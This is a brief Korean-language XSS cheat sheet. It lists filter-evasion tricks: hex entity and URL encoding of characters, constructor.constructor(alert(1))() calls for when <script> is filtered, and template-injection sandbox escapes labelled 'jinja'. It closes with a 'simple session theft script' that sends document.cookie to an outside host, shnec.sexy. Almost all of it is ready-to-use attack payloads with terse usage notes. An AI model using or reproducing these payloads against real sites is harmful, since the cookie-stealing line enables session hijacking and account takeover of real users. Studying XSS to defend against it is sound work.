A = 'A'
문자를 hex값으로 나타낸 후 &#x를 붙이면 decoding될때 A로 나타남
특수기호는 직접 인코딩을 해줘야함
'A'=%26%23x0041
<script>가 필터링 될때
constructor(alert(1))()
constructor.constructor(alert(1))()
jinja
{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}
{{constructor.constructor(alert(1))()}
간단한 session탈취 스크립트
<script>window.location.href='http://shnec.sexy/xss?data='+document.cookie;</script>